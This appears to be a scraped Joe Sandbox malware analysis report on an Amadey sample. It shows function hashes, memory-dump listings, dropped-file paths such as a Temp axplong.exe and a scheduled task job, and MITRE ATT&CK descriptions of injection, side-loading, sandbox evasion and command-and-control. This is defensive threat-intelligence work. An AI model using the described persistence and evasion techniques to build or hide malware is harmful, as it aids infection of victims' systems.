Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: e2bb16f9a1a17b54e9ad4280a957b1e836af5858f7e1757bd346bd453d5d1720
Instruction ID: e8bb70cf81b29499b6e4c5f3c973c6ca901278e4a7e5bbda3488079f8a8d8c96
Opcode Fuzzy Hash: e2bb16f9a1a17b54e9ad4280a957b1e836af5858f7e1757bd346bd453d5d1720
Instruction Fuzzy Hash: B5A1C0B1E00225AFDB11DF64DD45BAAB7B8FF15324F044129E815E7241EB39EA04EBD1

Function 00F570C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00F5710B

Strings

.cmd, xrefs: 00F57129
.bat, xrefs: 00F5713A
.exe, xrefs: 00F57118
.com, xrefs: 00F5714B

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 305cc73ea24d0e111077ead8a2d1136b0941306643f0ab8277500dd4a8ef0c3f
Instruction ID: 21e36ccd629ab0551d3d4794a4475728430c615e96fffd8561d692e25a0645cc
Opcode Fuzzy Hash: 305cc73ea24d0e111077ead8a2d1136b0941306643f0ab8277500dd4a8ef0c3f
Instruction Fuzzy Hash: 3101FE77E0CB162666187419BC0363B27989B82BB6715402BFF44F73C1DF48DC467591

Function 00F5C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00F5CA37

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction ID: 44d00dc7cde9e1c01eff40102b1627e9b075a3020976e769d88e6b376af58d6e
Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction Fuzzy Hash: 37B13632D003859FDB11CF28C8517AEBBE5EF55351F1441AADE46DB242D6388D4ADB90

Function 00F3BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00F3BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 00F3BB14
_xtime_get.LIBCPMT ref: 00F3BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 00F3BB43

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: a7cb8954c1ec7b5de5cb8f25d370b46a410abf94e934ae7e8aa832a6a6ba44f4
Instruction ID: 730ba4e2581208371287229a757ce6445ae665058da70b884a06ff7894211cae
Opcode Fuzzy Hash: a7cb8954c1ec7b5de5cb8f25d370b46a410abf94e934ae7e8aa832a6a6ba44f4
Instruction Fuzzy Hash: 86212F76E01219AFDF10EFA4DC419BEBBB8EF48724F100065FA01B7251DB34AD41ABA1

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

C:\Windows\Tasks\axplong.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
file.exe

Function 00F2BD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Function 00F25DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 00F27D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 00F56E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 00F5D4F4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Function 00F282B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 00F56C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 00F56F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 00F5D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Function 00F36AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON